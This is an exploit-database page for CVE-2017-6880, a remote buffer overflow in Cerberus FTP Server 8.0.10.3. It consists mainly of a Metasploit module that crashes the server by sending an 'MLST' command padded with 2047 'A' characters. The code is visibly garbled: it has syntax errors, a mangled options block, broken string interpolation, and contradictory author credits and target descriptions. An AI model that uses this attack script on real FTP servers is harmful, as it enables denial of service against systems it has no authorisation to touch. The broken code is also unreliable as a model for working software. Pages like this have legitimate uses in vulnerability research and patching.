Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow

2017.05.12
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/share/ruby #[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow #[+] Credits / Discovery: Nassim Asrir #[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ #[+] Metasploit Module Author : Souhardya Sardar #[+] Metasploit Module Author Contact: github.com/Souhardya | Souhardya.sardar@protonmail.com #[+] Author Company: Henceforth #[+] CVE: CVE-2017-6880 #Vendor: #=============== # #https://www.cerberusftp.com/ #Download: #=========== # #https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit) #Vulnerability Type: #=================== # #Remote Buffer Overflow. # ---------------------------- # Module Dependencies/requires # ---------------------------- require 'msf/core' # ---------------------------------- # Metasploit Class name and includes # ---------------------------------- class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp # ----------------------------------------- # Initialize information # ----------------------------------------- def initialize(info = {}) super(update_info(info, 'Name' => 'Cerber FTP Remote Buffer Overflow ', 'Description' => %q{ This module exploits a buffer overflow in the Cerber FTP client that is triggered by sending a bad char "A" in the command "MLST" (2047) . }, 'Author' => [ 'Module Author And Bug Discovered by : Peter Baris', 'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :) 'Thanks to : Nidhish Pandya ', #auditing:) ], 'License' => NONE, 'Platform' => ['win'] 'References' => [ [ 'CVE', 'CVE-2017-6880' ], [ Reference code taken from original POC located here :- https://www.exploit-db.com/exploits/41620/ ] ])) register_optionsOptPort.new('SRVPORT', [true, "The remote FTP server port", 21]) ], self.class) deregister_options('FTPUSER', 'FTPPASS') end def exploit connect payload = "A"*2047 print_status("Trying to connect to target server {target.name...") sock.put('MLST ' + payload + '\r\n') handler disconnect end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top